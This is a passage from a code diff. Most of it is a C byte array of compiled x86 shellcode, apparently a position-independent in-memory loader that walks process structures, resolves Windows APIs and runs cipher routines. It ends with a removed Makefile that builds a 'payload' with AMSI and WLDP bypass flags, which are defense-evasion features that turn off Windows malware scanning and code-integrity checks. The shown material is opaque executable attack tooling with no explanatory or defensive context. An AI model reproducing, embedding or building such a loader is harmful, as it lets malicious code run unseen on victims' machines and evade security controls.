582 0x14, 0x8d, 0x04, 0xa8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x20, 0x8b,
583 0x00, 0x03, 0xc6, 0x52, 0x50, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x59, 0x59,
584 0x85, 0xc0, 0x74, 0x16, 0x8b, 0x44, 0x24, 0x20, 0x83, 0xe8, 0x04, 0x89,
585 0x44, 0x24, 0x20, 0x83, 0xed, 0x01, 0x74, 0x1c, 0x8b, 0x54, 0x24, 0x2c,
586 0xeb, 0xd9, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x4c, 0x24, 0x10, 0x0f, 0xb7,
587 0x44, 0x68, 0xfe, 0x8b, 0x04, 0x81, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x24,
588 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0xfb, 0x09, 0x00, 0x00, 0xff,
589 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8, 0xed, 0x09, 0x00,
590 0x00, 0x8b, 0x44, 0x24, 0x3c, 0x83, 0xc4, 0x18, 0x85, 0xc0, 0x0f, 0x84,
591 0xb5, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8d,
592 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x74, 0x31, 0x8b, 0x8d,
593 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc9, 0x74, 0x15, 0x8d, 0x44, 0x24, 0x30,
594 0x50, 0x57, 0x53, 0xe8, 0x0a, 0x05, 0x00, 0x00, 0x8b, 0x8d, 0x0c, 0x05,
595 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x85, 0xc9, 0x8d, 0x44, 0x24, 0x30, 0x0f,
596 0x44, 0xc7, 0x50, 0x8b, 0x44, 0x24, 0x28, 0xff, 0xd0, 0xeb, 0x72, 0xff,
597 0xd0, 0xeb, 0x6e, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x38, 0x00, 0x74,
598 0x1a, 0x8d, 0x4c, 0x24, 0x30, 0x51, 0x50, 0x53, 0xe8, 0xd5, 0x04, 0x00,
599 0x00, 0x8d, 0x44, 0x24, 0x3c, 0x50, 0x53, 0xe8, 0x26, 0x02, 0x00, 0x00,
600 0x83, 0xc4, 0x14, 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0x68, 0x09,
601 0x00, 0x00, 0xff, 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8,
602 0x5a, 0x09, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x54, 0x02, 0x00, 0x00, 0x33,
603 0xc9, 0x83, 0xc4, 0x18, 0x39, 0x48, 0x04, 0x74, 0x15, 0x51, 0x51, 0x51,
604 0x55, 0x51, 0x51, 0xff, 0x53, 0x5c, 0x85, 0xc0, 0x74, 0x13, 0x6a, 0xff,
605 0x50, 0xff, 0x53, 0x58, 0xeb, 0x0b, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
606 0xff, 0x70, 0x30, 0xff, 0xd5, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00,
607 0x56, 0xff, 0x53, 0x40, 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0x24, 0x02,
608 0x00, 0x00, 0xc3, 0x81, 0xec, 0xf4, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c,
609 0x24, 0xfc, 0x02, 0x00, 0x00, 0x55, 0x56, 0x6a, 0x04, 0x8b, 0x83, 0x18,
610 0x09, 0x00, 0x00, 0x33, 0xf6, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x04,
611 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x56, 0xff, 0x53, 0x3c, 0x8b, 0xe8,
612 0x85, 0xed, 0x0f, 0x84, 0x84, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x08,
613 0x03, 0x00, 0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05,
614 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff,
615 0x53, 0x50, 0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
616 0x24, 0x14, 0x50, 0x53, 0xe8, 0x9f, 0xe5, 0xff, 0xff, 0x8d, 0x44, 0x24,
617 0x4c, 0x89, 0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8,
618 0x42, 0xe4, 0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89,
619 0x44, 0x24, 0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x3d, 0xee,
620 0xff, 0xff, 0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xbc, 0x00, 0x00,
621 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
622 0x0c, 0x50, 0x8d, 0x83, 0x94, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56,
623 0x8d, 0x83, 0x74, 0x06, 0x00, 0x00, 0x50, 0xff, 0x93, 0xc0, 0x00, 0x00,
624 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24,
625 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0xc4, 0x06, 0x00, 0x00,
626 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x0f, 0x85, 0xa0, 0x00,
627 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c,
628 0x85, 0xc0, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x0c,
629 0x8d, 0x54, 0x24, 0x14, 0x89, 0x4c, 0x24, 0x34, 0x52, 0x51, 0x8b, 0x01,
630 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x6d, 0x57, 0x8d, 0x84, 0x24, 0x00,
631 0x01, 0x00, 0x00, 0x50, 0x8d, 0x83, 0xe0, 0x05, 0x00, 0x00, 0x50, 0x53,
632 0xe8, 0x45, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x00,
633 0x01, 0x00, 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c,
634 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x52,
635 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x5f, 0x85,
636 0xf6, 0x75, 0x27, 0x8b, 0x44, 0x24, 0x10, 0x33, 0xf6, 0x56, 0x56, 0x56,
637 0x8b, 0x08, 0x56, 0x56, 0x56, 0x56, 0x56, 0x55, 0x50, 0xff, 0x51, 0x14,
638 0x85, 0xc0, 0x75, 0x10, 0x8b, 0x44, 0x24, 0x0c, 0x6a, 0x02, 0x50, 0x8b,
639 0x08, 0xff, 0x51, 0x14, 0xeb, 0x02, 0x33, 0xf6, 0x8b, 0x44, 0x24, 0x10,
640 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b,
641 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b, 0x08, 0xff,
642 0x51, 0x08, 0x8b, 0x83, 0x18, 0x09, 0x00, 0x00, 0x8d, 0x04, 0x45, 0x02,
643 0x00, 0x00, 0x00, 0x50, 0x56, 0x55, 0xe8, 0x67, 0x07, 0x00, 0x00, 0x83,
644 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x56, 0x55, 0xff, 0x53, 0x40,
645 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xf4, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec,
646 0x9c, 0x00, 0x00, 0x00, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x53, 0x55,
647 0x56, 0x8b, 0x40, 0x30, 0x57, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00,
648 0x89, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x10, 0x89, 0x44, 0x24, 0x18, 0x8d,
649 0x87, 0x4c, 0x03, 0x00, 0x00, 0x50, 0xff, 0x57, 0x38, 0x8b, 0xd8, 0x33,
650 0xc0, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0x0f, 0xb7, 0x6a, 0x14, 0x03, 0xea,
651 0x0f, 0xb7, 0x52, 0x06, 0x8d, 0x4d, 0x18, 0x85, 0xd2, 0x74, 0x12, 0x8b,
652 0xb7, 0x44, 0x03, 0x00, 0x00, 0x39, 0x31, 0x74, 0x6e, 0x40, 0x83, 0xc1,
653 0x28, 0x3b, 0xc2, 0x72, 0xf4, 0x8b, 0x5c, 0x24, 0x1c, 0x8b, 0x74, 0x24,
654 0x1c, 0x83, 0x64, 0x24, 0x10, 0x00, 0x85, 0xdb, 0x74, 0x48, 0x8b, 0xee,
655 0xc7, 0x44, 0x24, 0x28, 0x01, 0x00, 0x00, 0x00, 0x89, 0x6c, 0x24, 0x1c,
656 0xff, 0x75, 0x04, 0x57, 0xe8, 0x2e, 0xf0, 0xff, 0xff, 0x59, 0x59, 0x85,
657 0xc0, 0x74, 0x17, 0x8b, 0x44, 0x24, 0x18, 0x33, 0xc9, 0x41, 0x83, 0xc0,
658 0x40, 0x51, 0x55, 0x50, 0xff, 0x97, 0xc8, 0x00, 0x00, 0x00, 0x85, 0xc0,
659 0x75, 0x33, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc5, 0x04, 0x40, 0x89, 0x6c,
660 0x24, 0x1c, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3, 0x72, 0xc6, 0x33, 0xc0,
661 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x9c, 0x00, 0x00, 0x00, 0xc3, 0x6b,
662 0xc0, 0x28, 0x8b, 0x74, 0x28, 0x24, 0x03, 0xf3, 0x8b, 0x5c, 0x28, 0x20,
663 0xc1, 0xeb, 0x02, 0xeb, 0x90, 0x33, 0xc0, 0x40, 0x50, 0x8b, 0x44, 0x24,
664 0x1c, 0x83, 0xc0, 0x40, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0x97,
665 0xd0, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0xb4, 0x00, 0x00, 0x00, 0x55,
666 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x10, 0x00, 0xff,
667 0x76, 0x04, 0x57, 0xe8, 0xab, 0xef, 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0,
668 0x74, 0x14, 0x33, 0xc0, 0x40, 0x50, 0x56, 0x8d, 0x44, 0x24, 0x28, 0x50,
669 0xff, 0x97, 0xcc, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x44,
670 0x24, 0x10, 0x83, 0xc6, 0x04, 0x40, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3,
671 0x72, 0xcd, 0xeb, 0x20, 0x33, 0xc0, 0x40, 0x50, 0x55, 0x8d, 0x44, 0x24,
672 0x28, 0x50, 0xff, 0x97, 0xd0, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x8d, 0x44,
673 0x24, 0x24, 0x50, 0x56, 0xe8, 0xdd, 0x05, 0x00, 0x00, 0x83, 0xc4, 0x0c,
674 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x0c, 0x8b, 0x58, 0x0c, 0x83, 0x7b,
675 0x18, 0x00, 0x0f, 0x84, 0x14, 0x01, 0x00, 0x00, 0x8d, 0x87, 0x6c, 0x03,
676 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x44, 0x24, 0x14, 0x8a, 0x11, 0x33, 0xc0,
677 0x40, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xc0, 0x84, 0xd2, 0x0f,
678 0x84, 0xe1, 0x00, 0x00, 0x00, 0x8d, 0x7c, 0x24, 0x2c, 0x8b, 0xe9, 0x2b,
679 0xf9, 0x89, 0x7c, 0x24, 0x10, 0x8b, 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24,
680 0x10, 0x89, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x3b, 0x74, 0x29, 0x3d, 0x80,
681 0x00, 0x00, 0x00, 0x73, 0x22, 0x33, 0xff, 0x88, 0x14, 0x29, 0x80, 0xfa,
682 0x77, 0x0f, 0x45, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x70, 0x89, 0x7c, 0x24,
683 0x18, 0x0f, 0x44, 0x74, 0x24, 0x28, 0x40, 0x45, 0x8a, 0x55, 0x00, 0x84,
684 0xd2, 0x75, 0xce, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x6c,
685 0x24, 0x1c, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x74, 0x24, 0x10, 0x85, 0xc0,
686 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, 0x41, 0xc6, 0x44, 0x04, 0x2c, 0x00,
687 0x03, 0xc8, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0xff, 0x73, 0x18, 0x89, 0x4c,
688 0x24, 0x1c, 0xff, 0x57, 0x34, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0xf0, 0x85,
689 0xf6, 0x0f, 0x84, 0x65, 0xff, 0xff, 0xff, 0x83, 0x7c, 0x24, 0x18, 0x00,
690 0x74, 0x26, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff, 0xd6, 0x8b,
691 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x47, 0xff, 0xff,
692 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x3e, 0xff, 0xff, 0xff, 0x8b, 0x44,
693 0x24, 0x24, 0xeb, 0x23, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff,
694 0xd6, 0x8b, 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x21,
695 0xff, 0xff, 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x18, 0xff, 0xff, 0xff,
696 0x8b, 0x45, 0x04, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x06, 0xe9, 0x0a, 0xff,
697 0xff, 0xff, 0x8b, 0x1b, 0x8d, 0x87, 0x6c, 0x03, 0x00, 0x00, 0x83, 0x7b,
698 0x18, 0x00, 0x0f, 0x85, 0xf2, 0xfe, 0xff, 0xff, 0x33, 0xc0, 0x40, 0xe9,
699 0x34, 0xfe, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00,
700 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b,
701 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24,
702 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x68, 0x00, 0x01, 0x00, 0x00, 0xff,
703 0x74, 0x24, 0x10, 0x6a, 0xff, 0xff, 0x74, 0x24, 0x14, 0x6a, 0x00, 0x6a,
704 0x00, 0xff, 0x50, 0x50, 0xc3, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x58, 0x83,
705 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
706 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
707 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
708 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x25,
709 0xe7, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
710 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec,
711 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24,
712 0x28, 0x56, 0x57, 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89,
713 0x74, 0x24, 0x10, 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9,
714 0x74, 0x11, 0x83, 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47,
715 0x40, 0x89, 0x44, 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7,
716 0x8d, 0x74, 0x24, 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xf7,
717 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c,
718 0x72, 0x21, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00,
719 0x00, 0x00, 0x6a, 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24,
720 0x6a, 0x00, 0x50, 0xe8, 0xce, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b,
721 0x44, 0x24, 0x2c, 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a,
722 0x10, 0x89, 0x44, 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff,
723 0x10, 0x75, 0x15, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21,
724 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff,
725 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff,
726 0x5f, 0x5e, 0x8b, 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3,
727 0x83, 0xec, 0x10, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53,
728 0x55, 0x56, 0x8b, 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24,
729 0x10, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24,
730 0x1c, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24,
731 0x28, 0x8b, 0xce, 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2,
732 0xc1, 0xce, 0x08, 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3,
733 0xc1, 0xc7, 0x03, 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b,
734 0xe9, 0x43, 0x83, 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83,
735 0xc4, 0x10, 0xc3, 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b,
736 0x5c, 0x24, 0x24, 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b,
737 0x44, 0x24, 0x20, 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b,
738 0xe8, 0x57, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0,
739 0x8d, 0x7c, 0x24, 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74,
740 0x24, 0x28, 0x8b, 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9,
741 0x04, 0x72, 0xf3, 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b,
742 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10,
743 0x00, 0x00, 0x00, 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9,
744 0xc1, 0xc6, 0x08, 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce,
745 0xc1, 0xc7, 0x07, 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0,
746 0x10, 0x83, 0x6c, 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28,
747 0x89, 0x4c, 0x24, 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c,
748 0x24, 0x18, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44,
749 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34,
750 0x8b, 0xca, 0x6a, 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9,
751 0x74, 0x19, 0x8d, 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9,
752 0x8a, 0x04, 0x37, 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b,
753 0x6c, 0x24, 0x34, 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80,
754 0x01, 0x01, 0x75, 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3,
755 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff,
756 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x14, 0x8b,
757 0x4c, 0x24, 0x18, 0x83, 0x64, 0x24, 0x10, 0x00, 0x53, 0x55, 0x8b, 0x6c,
758 0x24, 0x24, 0x8a, 0x01, 0x56, 0x57, 0x88, 0x45, 0x00, 0x83, 0xcf, 0xff,
759 0x8d, 0x45, 0x01, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xdb, 0x8d,
760 0x41, 0x01, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
761 0x24, 0x14, 0x50, 0xe8, 0x67, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x0f,
762 0x84, 0x32, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x54,
763 0x01, 0x00, 0x00, 0x85, 0xc0, 0x8d, 0x44, 0x24, 0x18, 0x59, 0x50, 0x74,
764 0x7d, 0xe8, 0x45, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x74, 0x37, 0x6a,
765 0x04, 0x33, 0xf6, 0x5b, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x31, 0x01,
766 0x00, 0x00, 0x59, 0x8d, 0x34, 0x70, 0x83, 0xeb, 0x01, 0x75, 0xed, 0x8b,
767 0x54, 0x24, 0x18, 0x85, 0xf6, 0x74, 0x0a, 0x8b, 0xc2, 0x2b, 0xc6, 0x8a,
768 0x00, 0x88, 0x02, 0xeb, 0x03, 0xc6, 0x02, 0x00, 0x8b, 0x5c, 0x24, 0x10,
769 0x42, 0xe9, 0xef, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x54,
770 0x24, 0x18, 0x0f, 0xb6, 0x38, 0x40, 0x8b, 0xcf, 0x89, 0x44, 0x24, 0x14,
771 0x83, 0xe1, 0x01, 0x83, 0xc1, 0x02, 0xd1, 0xef, 0x74, 0x14, 0x8b, 0xf2,
772 0x2b, 0xf7, 0x8a, 0x06, 0x88, 0x02, 0x42, 0x46, 0x83, 0xe9, 0x01, 0x75,
773 0xf5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x43, 0x89, 0x5c, 0x24,
774 0x10, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0xe8, 0xfc, 0x00, 0x00, 0x00, 0x8b,
775 0xd0, 0x59, 0x85, 0xf6, 0x75, 0x2b, 0x83, 0xfa, 0x02, 0x75, 0x26, 0x8d,
776 0x44, 0x24, 0x14, 0x50, 0xe8, 0xe6, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24,
777 0x1c, 0x8b, 0xf0, 0x59, 0x85, 0xf6, 0x74, 0x76, 0x8b, 0xca, 0x2b, 0xcf,
778 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01, 0x75, 0xf5, 0xeb,
779 0x61, 0x8b, 0x4c, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14, 0x83, 0xf6, 0x01,
780 0x2b, 0xd6, 0xc1, 0xe2, 0x08, 0x0f, 0xb6, 0x39, 0x81, 0xc7, 0x00, 0xfe,
781 0xff, 0xff, 0x03, 0xfa, 0x41, 0x50, 0x89, 0x4c, 0x24, 0x18, 0xe8, 0xa4,
782 0x00, 0x00, 0x00, 0x59, 0x8b, 0xc8, 0x81, 0xff, 0x00, 0x7d, 0x00, 0x00,
783 0x72, 0x01, 0x41, 0x8b, 0x54, 0x24, 0x18, 0x8d, 0x41, 0x01, 0x81, 0xff,
784 0x00, 0x05, 0x00, 0x00, 0x0f, 0x42, 0xc1, 0x81, 0xff, 0x80, 0x00, 0x00,
785 0x00, 0x8d, 0x70, 0x02, 0x0f, 0x43, 0xf0, 0x85, 0xf6, 0x74, 0x13, 0x8b,
786 0xca, 0x2b, 0xcf, 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01,
787 0x75, 0xf5, 0x89, 0x54, 0x24, 0x18, 0x33, 0xf6, 0x46, 0xeb, 0x18, 0x8b,
788 0x4c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x18, 0x8a, 0x01, 0x88, 0x02, 0x42,
789 0x41, 0x89, 0x4c, 0x24, 0x14, 0x33, 0xf6, 0x89, 0x54, 0x24, 0x18, 0x85,
790 0xdb, 0x0f, 0x84, 0x9b, 0xfe, 0xff, 0xff, 0x5f, 0x5e, 0x2b, 0xd5, 0x5d,
791 0x8b, 0xc2, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x04, 0x8b,
792 0x4a, 0x0c, 0x8d, 0x41, 0xff, 0x89, 0x42, 0x0c, 0x85, 0xc9, 0x75, 0x13,
793 0x8b, 0x02, 0x8a, 0x08, 0x40, 0x89, 0x02, 0xc7, 0x42, 0x0c, 0x07, 0x00,
794 0x00, 0x00, 0x0f, 0xb6, 0xc1, 0xeb, 0x03, 0x8b, 0x42, 0x08, 0x8d, 0x0c,
795 0x00, 0xc1, 0xe8, 0x07, 0x89, 0x4a, 0x08, 0x83, 0xe0, 0x01, 0xc3, 0x56,
796 0x33, 0xf6, 0x46, 0xff, 0x74, 0x24, 0x08, 0xe8, 0xbf, 0xff, 0xff, 0xff,
797 0xff, 0x74, 0x24, 0x0c, 0x8d, 0x34, 0x70, 0xe8, 0xb3, 0xff, 0xff, 0xff,
798 0x59, 0x59, 0x85, 0xc0, 0x75, 0xe5, 0x8b, 0xc6, 0x5e, 0xc3, 0x8b, 0x54,
799 0x24, 0x0c, 0x8b, 0x44, 0x24, 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74,
800 0x13, 0x57, 0x8b, 0x7c, 0x24, 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88,
801 0x0e, 0x46, 0x83, 0xea, 0x01, 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44,
802 0x24, 0x08, 0x8b, 0x4c, 0x24, 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3,
803 0xaa, 0x8b, 0x44, 0x24, 0x08, 0x5f, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x8b,
804 0x4c, 0x24, 0x08, 0x53, 0x8a, 0x10, 0x84, 0xd2, 0x74, 0x0e, 0x8a, 0x19,
805 0x84, 0xdb, 0x74, 0x08, 0x3a, 0xd3, 0x75, 0x04, 0x40, 0x41, 0xeb, 0xec,
806 0x0f, 0xbe, 0x00, 0x0f, 0xbe, 0x09, 0x2b, 0xc1, 0x5b, 0xc3};
807
+0
-12
payload/Makefile.mingw less more
0 x64:
1 x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
